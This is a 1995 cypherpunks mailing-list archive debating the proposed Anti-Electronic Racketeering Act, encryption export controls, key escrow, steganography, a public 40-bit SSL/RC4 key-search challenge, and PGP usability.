where is a better place to live and still has the same or better freedoms. *serious question* ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From liberty at gate.net Thu Jul 13 12:34:50 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 13 Jul 95 12:34:50 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507131932.PAA01245@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Weld Pond responding to Duncan Frissell wrote: >That raises an interesting issue. >Will they have to invent a huge new bureaucracy >to manage all these devices and programs? Talk about a self-answering question...How else could it be done? >There are many problems with this idea of >Government Access to Devices or Programs (GADOP). I can think of only one problem with the idea, it's called the Bill of Rights. [If there is anything left of it after this session of Congress.] >A toolset that could build many different encryption >and decryption variations based on psuedo-random input >may be a good tool to fight this nonsense. Agreed. As well as steganographic software of many kinds to hide this terrible "crime" we all love to commit, for the peace loving among us... BUT [and I hope this doesn't happen.] I fear that the anarchy resulting from this kind of statist idiocy will lead many (otherwise peaceful) folks to think that the only good tool to fight this nonsense is a good shotgun. Of course, then we can simply outlaw those, too. Regards, Jim Ray - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMAVlCG1lp8bpvW01AQEkAgP/doDZKY1TKgBJPy7ame16kbqU0F+BOfl/ wuIkpnsnsoyyV6Fi7KzHPLGsZU+uuMjdxLyOhtmvswKAfq6XU68GTfHuCCImiE8D 6RuaPWkn+eAQmVhXrbmf2ykZwWrnLZ4sT12eyNQjKoavuxTgFPGFqbvIASnIwe/E OLBNyviUOSA= =M7wP - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAV0pSoZzwIn1bdtAQFPDgGAu5kR4N1OlOm++LZZX4AAraYFbcgwhRiq qN7x31Enfv4Gaocg0m4TmB4YYdJxyzht =WV8f -----END PGP SIGNATURE----- From jlasser at rwd.goucher.edu Thu Jul 13 12:37:18 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 13 Jul 95 12:37:18 PDT Subject: def'n of "computer network" In-Reply-To: <9507131927.AA12842@snark.imsi.com> Message-ID: On Thu, 13 Jul 1995, Perry E. Metzger wrote: > Jon Lasser writes: > > In addition, now is the time to deploy stego, on a massive scale. > > I've said it before, and I'll say it again. > > My opinion is that stegonography "standards" are useless. Anyone can > try unpeeling the GIFs and see if something interesting shows up > inside. That means that the only useful stego suffers from the defect > that symmetric key cryptography suffers from -- you have to have made > serious pre-arrangements with the counterparty. True, in that sense it's useless. But if it's PGP'd with a sufficient key, nobody can read it. If it's from a well-overused guest account, nobody can find who sent it. If the picture's not preceded with an identification of the intended recipient, and is posted in a public forum, then nobody knows who it's for. Especially if everyone has to read it in order to find out if it's for them. If PGP 3.0 has some sort of option to decrypt messages without PGP headers or footers, then the issue ceases to be relevant. Because you've stego'd already random-seeming material. If the stego program is integrated with PGP properly, you have public key stegonography. It's possible; just that somebody's gotta write the damned software. And I'm certainly not capable to do that. Yet. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From hfinney at shell.portal.com Thu Jul 13 12:46:37 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 13 Jul 95 12:46:37 PDT Subject: SSL RC4 challenge Message-ID: <199507131945.MAA02875@jobe.shell.portal.com> From: Hal > Here is a challenge to try breaking SSL using the default exportable > encryption mode, 40-bit RC4. > [...] It has been pointed out to me that I made a mistake in my analysis of the SSL packets. The MAC at the beginning of the encrypted packets is itself RC4 encrypted. That means that the 17 bytes of known plaintext start 16 bytes into the stream, not at the beginning as I thought. This just means that after key setup, RC4 has to be cycled 16 times before we start comparing its output with the XOR of the known plaintext and ciphertext. I'll produce a revision of my "challenge". If no other mistakes are found I'll post it to sci.crypt. Hal From perry at imsi.com Thu Jul 13 12:46:51 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 12:46:51 PDT Subject: def'n of "computer network" In-Reply-To: Message-ID: <9507131946.AA12904@snark.imsi.com> Although I hardly oppose the construction of "headerless" cryptographic protocols, they make key management in any sort of a reasonable system a living hell. If you work for an organization maintaining a reasonable number of keys -- say a few hundred at some institution -- you will have to linearly search them to find which one is the right one. What a royal pain. Rapid deployment in ordinary software is, of course, preferable. Perry From jburrell at crl.com Thu Jul 13 12:50:11 1995 From: jburrell at crl.com (Jason Burrell) Date: Thu, 13 Jul 95 12:50:11 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: On Wed, 12 Jul 1995, Brad Dolan wrote: > ---------- Forwarded message ---------- > Date: Wed, 12 Jul 1995 15:28:25 -0400 > Subject: Anti-Electronic Racketeering Act of 1995 > > > On June 27, Sen. Grassley introduced extensive criminal amendments to the > federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of > 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), > 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 > (wiretapping), and 42 USC 2000aa (Privacy Protection Act). > > This proposed legislation is Very Bad. It would make all encryption > software posted to computer networks that are accessible to foreigners > illegal *regardless of whether the NSA has classified the software as a > munition!!!* Here's the language: > > "Sec. 1030A. Racketeering-related crimes involving computers > "(a) It shall be unlawful-- > > . . . > > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." en-code (inkoud) pres. part. en-cod-ing past and past part. en-cod-ed to put into code code (koud) 1. n. a collection of statutes, rules, etc. methodically arranged || an accepted way of signals, Morse code || a system in which arbitrary values are given to letters, words, numbers or symbols to ensure secrecy or brevity (cf. CIPHER) 2. v.t. pres. part. cod-ing past and past part. cod-ed to put (a message) into code || (genetics) to particularize the genetic code used in synthesizing [F.] (Source: New Webster's Dictionary and Thesaurus of the English Language, 1993) Assuming that this isn't contradicted by other parts of the legislation, doesn't this outlaw distribution "to computer networks" software for everything from compression to data structures to TCP/IP to ROT13 to PGP? The bad part is that they might "compromise" and, by the time its over with, it still outlaws non-GAK crypto. At least when its overly broad it has a better chance of getting laughed out of court. The United States Government *is* this stupid. If you are unfortunate enough to live within U.S. borders, welcome to hell. *heavy sigh* -- PGP public key available via finger. GCS/AT d H- s-: g+ p2+ au+ !a w++ v++(--)>! C++++ UL+++>++++ P++ L++>+++ 3- E- N+++ K W--(---) M- V-- po--- Y++ t 5+++ j R+++ G tv+ b+>++ D B-- e- u*(**) h* f(+) r(-)@ n--->+++ x? From SADLER_C at HOSP.STANFORD.EDU Thu Jul 13 12:51:38 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Thu, 13 Jul 95 12:51:38 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: Subject: Re: Crisis Overload (re Electronic Racketeering) Date: Thu, 13 Jul 1995 12:27:18 PDT A1-type: DOCUMENT Importance: normal >On July 13, 1995, Robert Hayden said: >Unfortunately, a system of social engineering needs to be adopted to get >massive use of cryptography started. This means, and I advocated this >from the day I entered this forum, that programs such as PGP need to be >redesigned so that the a user friendly . . . so user friendly that any >Joe Moron can figure out not only how to use them, but also how it helps >them and how it is "good" for them. This means that we need simplified >key management easy enough for the point-and-click masses to utilize. >... >Unfortuately, all I can do is stand on the sidelines and cheer, because I >am not a programmer; I'm a user and a teacher. Well put! I agree wholeheartedly! I have friends who are mostly teachers and writers who are interested in encryption from what I've told them, but their computer knowledge is pretty much limited to their word processors. A good user interface would do wonders for spreading the use of PGP. Unfortunately I am not a programmer either, but I am being motivated to become one. If only there was more time... Connie From jlasser at rwd.goucher.edu Thu Jul 13 12:53:53 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 13 Jul 95 12:53:53 PDT Subject: def'n of "computer network" In-Reply-To: <9507131946.AA12904@snark.imsi.com> Message-ID: On Thu, 13 Jul 1995, Perry E. Metzger wrote: > Although I hardly oppose the construction of "headerless" > cryptographic protocols, they make key management in any sort of a > reasonable system a living hell. If you work for an organization > maintaining a reasonable number of keys -- say a few hundred at some > institution -- you will have to linearly search them to find which one > is the right one. What a royal pain. Hmmm. no arguement. But seeing as it might all soon be illegal, I'd rather it be a possible pain than just plain impossible. > Rapid deployment in ordinary software is, of course, preferable. It would seem that we may be approaching the criminalization of crypto. In which case we'd still be in trouble. Because they might criminalize the /use/ of crypto. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From adam at bwh.harvard.edu Thu Jul 13 12:54:12 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 13 Jul 95 12:54:12 PDT Subject: def'n of "computer network" In-Reply-To: <9507131927.AA12842@snark.imsi.com> Message-ID: <199507131950.PAA08076@spl.bwh.harvard.edu> Perry writes: | > In addition, now is the time to deploy stego, on a massive scale. | | I've said it before, and I'll say it again. | | My opinion is that stegonography "standards" are useless. Anyone can | try unpeeling the GIFs and see if something interesting shows up | inside. That means that the only useful stego suffers from the defect | that symmetric key cryptography suffers from -- you have to have made | serious pre-arrangements with the counterparty. While you may be right that a standard for stego in part defeats the purpose of stego, the problem of not having some sort of standard means that people with non-standard platforms (for some definition of non-standard) will be shut out. Standards for interaction are useful, and if the thing being stego'd is stealth PGP'd, then I'm not sure that the data pulled out of a stego'd GIF need be any different than noise. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From perry at imsi.com Thu Jul 13 12:59:49 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 12:59:49 PDT Subject: laws.... In-Reply-To: Message-ID: <9507131959.AA12939@snark.imsi.com> By the way, I'm really sick of the naming schemes on these laws. Its only a matter of time before some 1984ish wag creates the "Omnibus Universal Love and Happiness Act of 1998" providing the death penalty for possessing trace quantities of marijuana or some such. The Orwellian names on some of these bills are simply astounding. Perry From bdolan at use.usit.net Thu Jul 13 13:12:18 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Thu, 13 Jul 95 13:12:18 PDT Subject: mistake on my part In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk> Message-ID: On Thu, 13 Jul 1995 aba at atlas.ex.ac.uk wrote: > > Perry Metzger writes on cpunks: > > I made a small mistake -- the new bill does *not* make it a crime to > > make crypto software available at Egghead -- but it does more or > > less make distribution of crypto software over the internet > > impossible if it isn't an escrow based system. > > I thought there was some kind of "read my lips" type statement about > not mandating key escrow a short while ago. Making it illegal to not > use escrow on the internet (in the US and certain materials) sounds > dangerously close to mandating key escrow. > > Also I remember one list member making a prediction, that as they'd > said _definately no key escrow_, that you could bet your ass that > meant exactly the opposite, and that it would rear it's head anytime > soon. I think the poster even had a prediction in terms of months, > but don't have the original post handy, looks like he was right. > > Anyway these things are in stages: > > 1. voluntary key escrow > 2. mandatory key escrow for certain materials > 3. mandatory key escrow across the board > > If they pull this off stage 2, I wonder how long till stage 3, I think > it'll be time to leave the sinking ship while exit visas are still > granted! Seriously! Looking for a place that: (1.) is reasonably free (2.) permits Americans to work (3.) a person trained as an engineer can earn enough to feed and shelter self and 4 dependents. Any suggestions? > > Adam > -- > ------------------ PGP.ZIP Part [025/713] ------------------- > M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F > MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/ > MC at FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D > ------------------------------------------------------------- > for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ > > From pgf at tyrell.net Thu Jul 13 13:14:00 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 13 Jul 95 13:14:00 PDT Subject: The end of public key cryptography as we know it? In-Reply-To: <199507131846.NAA06768@netman.eng.auburn.edu> Message-ID: <199507132009.AA15283@tyrell.net> From: Doug Hughes Date: Thu, 13 Jul 1995 13:46:10 -0500 An article posted on sci.crypt stated that quantum factoring is real and that an article was posted in this month's Science magazine. The author of the post says this would make factoring a 10 bit number the same time as factoring a 100000000 bit number. You can bet your ass and your mother's and grandmother's donatable organs that if this were possible, then the legislative initiatives currently underway would not be: they'd just let us use RSA and get a false sense of security. A wonder how long it is before every major government in the world has one of these. Makes RSA's future kind of moot doesn't it?? Well, it would probably "prove" many-worlds right: in which case we're probably going to be invaded from the one where the Nazis won WWII, or the libertarians won Shay's Rebellion. From perry at imsi.com Thu Jul 13 13:51:40 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 13:51:40 PDT Subject: co-sponsors Message-ID: <9507132051.AA13247@webster.imsi.com> I searched Thomas and couldn't find any evidence of co-sponsors to the Senate bill. Am I wrong here? .pm From tbird at eagle.wbm.ca Thu Jul 13 14:00:06 1995 From: tbird at eagle.wbm.ca (Kevin Stumborg) Date: Thu, 13 Jul 95 14:00:06 PDT Subject: No Subject Message-ID: <199507132100.PAA14248@eagle.wbm.ca> send me mail From sunder at escape.com Thu Jul 13 14:00:59 1995 From: sunder at escape.com (Ray Arachelian) Date: Thu, 13 Jul 95 14:00:59 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131059.AA20485@cs.umass.edu> Message-ID: On Thu, 13 Jul 1995, L. McCarthy wrote: > STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June > 27, 1995) > Sen. GRASSLEY > > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the > Anti-electronic Racketeering Act of 1995. This bill makes important changes > to RICO and criminalizes deliberately using computer technology to engage in > criminal activity. I believe this bill is a reasonable, measured and strong > response to a growing problem. According to the computer emergency and > response team at Carnegie-Mellon University, during 1994, about 40,000 > computer users were attacked. Virus hacker, the FBI's national computer > crime squad has investigated over 200 cases since 1991. So, computer crime is > clearly on the rise. Eh, what do "virus hackers" have to do with encryption, why is it these morons justify the destruction of encryption by mentioning hackers and viruses? Additionally, does this mean that someone outside of the USA is in danger of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing crypto software and publishing it in the open? After all, once it winds up on some USA site, how do we know that someone outside the USA got his copy of SuperDuperNSASpookFree from a non-US site? Just to be sure, we'll bust both the site operator and nab the guy who wrote it next time he drops in, or hell, we'll have him extradited. > Mr. President, I suppose that some of this is just natural. Whenever man > develops a new technology, that technology will be abused by some. And that > is why I have introduced this bill. Yes, whenever man develops a privacy increasing technoloy, the spooks will see to it, that they abuse everyone's rights to that privacy, and then some! > I believe we need to seriously reconsider > the Federal Criminal Code with an eye toward modernizing existing statutes > and creating new ones. In other words, Mr. President, Elliot Ness needs to > meet the Internet. Where is Elliot Ness? I don't see any mafia.org on the net. Anyone here see any such site? > Mr. President, I sit on the Board of the Office of Technology Assessment. > That Office has clearly indicated that organized crime has entered cyberspace > in a big way. International drug cartels use computers to launder drug money > and terrorists like the Oklahoma City bombers use computers to conspire to > commit crimes. Was it not proven that McVeigh and Co. >DID NOT< use a computer? THe AOL account was a hoax, no? Where are the hoardes of anti-USA terrorists, and drug pushers on the net? Certainly, I see no drugs.com site... web, ftp, email, usenet or otherwise. > << I haven't heard much to suggest that McVeigh was using a > << computer for anything, but we all saw this line coming, right ? > << 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess > << Exon & Gorton have ridden off after the fourth already.... Ditto above. > Computer fraud accounts for the loss of millions of dollars per year. And > often times, there is little that can be done about this because the computer > used to commit the crimes is located overseas. So, under my bill, overseas > computer users who employ their computers to commit fraud in the United > States would be fully subject to the Federal criminal laws. Yeah, so, why blame citizen units in the USA for actions outsiders committed.? Why limit the spread and use of cryptographically strong tools from being developed in the USA? If Joe Badguysky breaks into your house and steals your copy of PGP, then exports it to his fatherland, should I arrest you for that? What if he breaks into your store and steals a copy off the shelf and exports it? Why punish the victim? > It is not enough to simply modernize the Criminal Code. We also > have to reconsider many of the difficult procedural burdens that prosecutors > must overcome. For instance, in the typical case, prosecutors must identify a > location in order to get a wiretapping order. But in cyberspace, it is often > impossible to determine the location. And so my bill corrects that so that if > prosecutors cannot, with the exercise of effort, give the court a location, then > those prosecutors can still get a wiretapping order. Oh, the poor poor LEA's. If they can't prove you're guilty (because you aren't, and there is no proof because you aren't,) let them throw you in jail anyway. > << All together now: "TRUST US" > > Mr. President, this brave new world of electronic communications and global > computer networks holds much promise. But like almost anything, there is the > potential for abuse and harm. That is why I urge my colleagues to support > this bill and that is why I urge industry to support this bill. And this type of bill is where the potential for abuse and harm arises. The harm of course is to those who will be thrown in jail for wanting privacy. > On a final note, I would say that we should not be too scared of > technology. Gee, who is scared? Don't be scared, be Big Brother. :-( > After all, we are still just people and right is still right and > wrong is still wrong. Some things change and some things do not. Circular reasonings and politician's spewing? I can see th masses applauding this... all wearing PJ's and bearing shaved heads watching Big Brother on the screen infront of them... > All that > my bill does is say you can't use computers to steal, to threaten others or > conceal criminal conduct. > > << Ah, if that's all it does, why not scrap the whole thing and not waste > << the Senate's valuable time ? After all, stealing, threatening, and > << concealing criminal conduct are already outlawed.... So, what countries are left free of encryption regulations? (English speaking preffered, with affordable net access.) Time to see about getting a new passport... =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From vznuri at netcom.com Thu Jul 13 14:02:33 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 13 Jul 95 14:02:33 PDT Subject: speeding detected by civilians Message-ID: <199507132101.OAA27319@netcom12.netcom.com> hate to start another endless thread on speeding limits, but this is an interesting privacy anecdote... hope this hasn't been posted here. === From: "Steven M. Horvath" Subject: Speeder's Beware of Vernon Hills, IL. To: snet-l - - -------- FYI------------------FYI--------------------FYI----------------- Vernon Hills, IL. Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing citizens to check out radar guns from the local police department to catch speeders in their community. The radar guns are combined with cameras in order to instantaneously capture the car, license number, and the rate of speed. The citizens can check out the units for a week at a time. The police have stated that they, at this time, will use the data to issue warning letters to the violaters. - ------- End of Forwarded Message ------- End of Forwarded Message From perry at imsi.com Thu Jul 13 14:02:38 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 14:02:38 PDT Subject: HR361 Message-ID: <9507132102.AA13309@webster.imsi.com> Has anyone previously noted that HR361, the omnibus export administration act, would require the administration to assess the impact of the current crypto export controls on the software industry? .pm From jfmesq at ibm.net Thu Jul 13 14:18:17 1995 From: jfmesq at ibm.net (James F. Marshall) Date: Thu, 13 Jul 95 14:18:17 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net> -----BEGIN PGP SIGNED MESSAGE----- >In the subsection that explicitly mentions crypto, it says that it's >unlawful to put (non-GAK) crypto on an open net, "regardless of >whether such software has been designated non-exportable". If the >phrase "nonexportable" means the same thing in the context of this >subsection, then provision (b) would only seem to apply RICO to stuff >that already falls under ITAR. Pardon me if I misunderstood your point. I haven't read the whole bill, but I read the "regardless" phrase with a different emphasis. In short, that language appears to mean that one could be pounded with RICO for uploading crypto software even if the crypto is EXPORTABLE. The part about subsequent instances of actual access to non-exportable crypto by foreigners, etc. appears to address a different situation -- the situation where the crypto is non-exportable. In this different and much more "defiant" situation, the language would allow the feds to count predicate acts, not merely according to the actual instances of uploading activity, but also according to the number of times the crypto is downloaded by foreigners, etc. Perhaps a 10,000 to 1 ratio? It is unclear, not having read the entire bill, whether the onerous provision in the case of non-exportable crypto would apply in the case of exportable crypto. Perhaps our resident federal prosecutor might volunteer some insights into how the government might prove thousands of predicate acts, and thus a huge pattern of racketeering activity, as a result of a defendant uploading non-exportable crypto once to one site, and how the government might argue that uploading exportable crypto once to one known mirrored site (e.g., hobbes) would constitute uploads to all the mirrors -- i.e., multiple predicate acts. This email is academic speculation. This email is not legal advice, is not a consultation with counsel, and does not create an attorney- client relationship. (As a condition of entering into an attorney- client relationship, I require a formal, ink-signed fee agreement.) - --Jim -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAVmsEK9bzU1tDCZAQGOcAP/StGc/+/sbRCZLRJTwnhMGtda3Z7tYQ6G QhllCCwGZ0gddwtCmH98hQaQLAbGaFyaUd4SroM3bj3/NXX2xFucnY9ogPN2LHS9 9MZ/RzBO33iVjl/F0fHAIJiCnGCkHM58Gftgtg7gyOKCs+wBkJNQgOxsuuxw2rSs /nlYAv+ukN8= =wCJA -----END PGP SIGNATURE----- From gate at id.WING.NET Thu Jul 13 14:25:50 1995 From: gate at id.WING.NET (The Gate) Date: Thu, 13 Jul 95 14:25:50 PDT Subject: laws.... In-Reply-To: <9507131959.AA12939@snark.imsi.com> Message-ID: Yeah I know what you mean. Like, it's gonna be, bust down your fuckin' door and some goon's gonna go, do you have a floppy disk in here? Lee. On Thu, 13 Jul 1995, Perry E. Metzger wrote: > > By the way, I'm really sick of the naming schemes on these laws. Its > only a matter of time before some 1984ish wag creates the "Omnibus > Universal Love and Happiness Act of 1998" providing the death penalty > for possessing trace quantities of marijuana or some such. The > Orwellian names on some of these bills are simply astounding. > > Perry > ------------------------------------------------------------------------------ R. Leland Lehrman Phone: (203) 777-1827 God, Art, Technology and Ecology Research and Development From gate at id.WING.NET Thu Jul 13 14:35:38 1995 From: gate at id.WING.NET (The Gate) Date: Thu, 13 Jul 95 14:35:38 PDT Subject: Mr. Newbie... In-Reply-To: Message-ID: Okay folks, here comes Mr. Newbie. Duh...How can I figure out how to use pgp. Is there a good place to learn the background and basics in a step-by-step easy to understnad way? Duh... I think I wanna know... ------------------------------------------------------------------------------ R. Leland Lehrman Phone: (203) 777-1827 God, Art, Technology and Ecology Research and Development From gorkab at sanchez.com Thu Jul 13 14:40:22 1995 From: gorkab at sanchez.com (It's supposed to crash like that.) Date: Thu, 13 Jul 95 14:40:22 PDT Subject: Encryption and ITAR Message-ID: <009934CEC4F49140.000004E7@sanchez.com> Anyone know how far ITAR reaches? Is there a list of programs that are illegal to take from america anywhere else? My company does a LOT of buisness (80%) outside the US, and I wonder if they are maybe pissing off the NSA or somthing with some software they take with them. (a DES encrypter, and some other encryption stuff) From cman at communities.com Thu Jul 13 14:42:16 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 13 Jul 95 14:42:16 PDT Subject: Fight, or Roll Over? Message-ID: Since the Anti-Electronic Racketeering Act of 1995 might as well be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see Tim throw in the towel already, when the bill hasn't even made it through committee yet. Not that I place a lot of faith in our elected officials, but this bill seems to step on so many toes, and to be so plainly idiotic, that we are bound to get some support from unexpected quarters. Nothing surprised me more, in fact, than all the mainstream IS magazines (like Information Week) denouncing the Exon ammendment. This, though, is a much more subtle and insidious bill, and takes away something that most people don't even know they want yet. (The Exon ammendment, on the other hand, could have been dubbed, "The Cypherpunk Market-Creation Act of 1995.") Nevertheless, it is certainly possible to fight this bill and win, while at the same time, preparing to go underground if it passes. Go underground? Well, as I read it, this bill basically makes cypherpunks a "corrupt organization", subject to the full impact of the RICO statutes. With the passage of this bill, we will have the same status in the US as the neo-Nazis have in Germany, and will have to adopt similar communications and organization techniques. Who knows, maybe this is the best thing that could happen, although I'm real curious about who will back off to protect their ass-ets and who will actually keep on chugging towards crypto anarchy. In the short term, I've renewed or started memberships in the organizations that are likely to fight this -- but I'm also fired up to get more easy-to-use software out there, and do what I can to help build infrastructure that can resist this sort of nonsense. From jshekter at alias.com Thu Jul 13 14:46:17 1995 From: jshekter at alias.com (Jonathan Shekter) Date: Thu, 13 Jul 95 14:46:17 PDT Subject: SSL RC4 challenge Message-ID: <9507131745.ZM12634@lennon.alias.com> Quoth tedwards at src.umd.edu: >On Wed, 12 Jul 1995, alex wrote: >> Can't we hold off a few weeks on this, so that we can all short the stock >> once it's been offered? > >Hmm...well, considering we have yet to break the first 40-bit RC4 key >(with 87.1 of the keyspace searched), I think it might be a bit early to >make financial decisions based on our cracking abilities. Yes, but it is highly unlikely we have a valid plaintext/cyphertext pair. Since the format of SSL is known precisely, we won't have this problem. But, yes, let's break the example SSL transaction first. - Jonathan -- ____________________________________________________ / Jonathan Shekter / / / Graphics Hack / "Probability alone / / Alias/Wavefront / dictates that I exist" / /______________________/____________________________/ From sryan at reading.com Thu Jul 13 14:56:14 1995 From: sryan at reading.com (steven ryan) Date: Thu, 13 Jul 95 14:56:14 PDT Subject: private idaho Message-ID: <199507132155.RAA15645@zork.tiac.net> I am trying to run Private Idaho. I tried the 2.1 version as well as the new beta version. I have all the files in the same directory as PGP. When I create a message and select clear sign it spawns a dos box that is all black with the cursor in the top left corner. If I hit return it closes the box and gives the following message: File not found in the sign routine, couldn't create output file. Any ideas on what might cause this or pointers to additional information would be welcome. Steven Ryan sryan at reading.com From sandfort at crl.com Thu Jul 13 14:57:46 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 13 Jul 95 14:57:46 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: <9507131924.AA12834@snark.imsi.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 13 Jul 1995, Perry E. Metzger wrote: > As unpleasant as the congress is, it isn't the enemy. The governmental > forces desiring control are not the same as the congress. I'm not so sure. Both politicos and bureaucrats go into their respective lines of work for many reasons. One of the main reasons--in my opinion--is a lust to control others. Being the "others," we should resist this tendancy. This begins with the realization that most of them *are* the enemy and acting accordingly. > This is not to say that we shouldn't be widely deploying crypto -- we > should. (Of course, offshore sites will always have crypto available, > but...) Yes, what we really need is easy, drop-in, point-and-click PGP for the computer neophytes. And we need to give it away to all of them. I wish I know how to accomplish all that. My "wish list" also includes a fantasy in which someone (hopefully, a Cypherpunk) cracks some NSA developed, secret algorithm, crypto system, preferably causing some sycophantic company or organization to lose a bundle. Ah, dreams. S a n d y P.S. My 84 year old mother went in to buy a refrigerator from Sears or Monkey Wards or whomever. She picked out a top-of-the-line Tappan. However, when she was getting ready to pay, the salesperson began to ask her a series of questions which included her age and social security number. My mom said, "Just stop right there. If you want to ask all this personal information, I'll just buy it somewhere else." The stopped asking questions and took her check. I think Nancy Reagan had a good idea there. Just say `NO'. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Thu Jul 13 15:06:49 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 13 Jul 95 15:06:49 PDT Subject: speeding detected by civilians In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 13 Jul 1995, Vladimir Z. Nuri wrote: > Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing > citizens to check out radar guns from the local police department to > catch speeders in their community. The radar guns are combined with > cameras in order to instantaneously capture the car, license number, and the > rate of speed. The citizens can check out the units for a week at a time. The > police have stated that they, at this time, will use the data to issue > warning letters to the violaters. Great! I'll take a hundred, please. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jlasser at rwd.goucher.edu Thu Jul 13 15:06:53 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 13 Jul 95 15:06:53 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Ray Arachelian wrote: > So, what countries are left free of encryption regulations? (English > speaking preffered, with affordable net access.) Time to see about > getting a new passport... How about "not respecting international copyright law, and not having extradition treaties with the US" ... set up a data haven, we now know why we need it soon... charge by the Kbyte, automate the billing, and relax. Anybody seriously interested? Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From cman at communities.com Thu Jul 13 15:07:17 1995 From: cman at 